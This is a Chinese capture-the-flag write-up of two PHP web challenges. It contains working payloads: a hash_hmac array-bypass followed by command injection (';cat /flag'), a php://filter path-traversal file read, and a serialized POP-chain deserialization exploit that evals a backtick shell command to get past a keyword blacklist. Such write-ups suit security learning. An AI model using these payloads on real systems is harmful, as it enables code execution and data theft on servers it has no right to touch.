web

huluwa

音频末尾有源码

1
2
3
4
5
6
7
8
9
10
11
12
if (empty($_POST['Huluxiaojinggang']) || empty($_POST['Shejing'])) {
    die('1');
}
$secret = getenv("secret");
if (isset($_POST['yeye']))
    $secret = hash_hmac('sha256', $_POST['yeye'], $secret);
$qwer = hash_hmac('sha256', $_POST['Shejing'], $secret);
echo $qwer . '<br>';
if ($qwer !== $_POST['Huluxiaojinggang']) {
    die('2');
}
echo exec("nc" . $_POST['Shejing']);

利用数组报错使得secret=null然后就可以利用函数获得$qwer里面的内容。

所以最终payload:

1
yeye[]=1&Huluxiaojinggang=c7e4698914f5d06bf59a9b3b081046f261170deb991ca94e9c2ddfafe928560a&Shejing=;cat /flag

php-levels

首先采用php伪协议读取了hint.php文件里面内容

1668932265719

事实上这个能出来纯属巧合,原本能绕过的payload应当是

1
php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/usr/share/nginx/html/hint.php

然后进行base64解码得到了源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
<?php
error_reporting(0);

class mouse
{
    public $rice;
    function __isset($n){
        $this->rice->nothing();
    }

}

class dog
{
    public $a;
    public $b;
    public $c;
    function __wakeup(){
        $this->a = 'chance?';
    }
    function __destruct(){
        $this->b = $this->c;
        die($this->a);
    }
}

class ct
{
    public $fish;

    function __toString()
    {
        if(isset($this->fish->d))
        {
            echo 'you wrong';
        }
    }

}

class get
{
    public $cmd;

    function __call($name,$no)
    {
        eval($this->cmd);
    }
}

$pop = $_GET['pop'];

if (!preg_match('/sys|pas|read|file|ls|cat|tac|head|tail|more|less|base|echo|cp|\$|\*|\+|\^|scan|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$pop)){
    echo "you will get flag".'</br>';
    unserialize($pop);
}
else{
    die("Try again!");
}

是一个php链条

从dog->ct->mouse->get

构造payload绕过正则

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
<?php
error_reporting(0);

class mouse
{
    public $rice;
    function __construct()
    {
        $this->rice = new get;
    }
}

class dog
{
    public $a;
    public $b;
    public $c;
    function __construct()
    {
        $this->a = 'chance?';
        $this->b = &$this->a;
        $this->c = new ct;
    }
}

class ct
{
    public $fish;
    function __construct()
    {
        $this->fish = new mouse;
    }

}

class get
{
    public $cmd;
    function __construct()
    {
        $this->cmd = 'print(`c\at /realflag/you_want_flag.php`);';
    }
}

$b = new dog;
var_dump(serialize($b));

// O:3:"dog":3:{s:1:"a";s:7:"chance?";s:1:"b";R:2;s:1:"c";O:2:"ct":1:{s:4:"fish";O:5:"mouse":1:{s:4:"rice";O:3:"get":1:{s:3:"cmd";s:42:"print(`c\at /realflag/you_want_flag.php`);";}}}}

1668932556210

1
flag{c91d38f0-86ea-4f36-b4d8-5e6a716ea8fe}

另外一种构造是

1
2
$this->cmd = '?><?=`nl
/realflag/you_want_flag.php`;';

用这?><?替代了echo的作用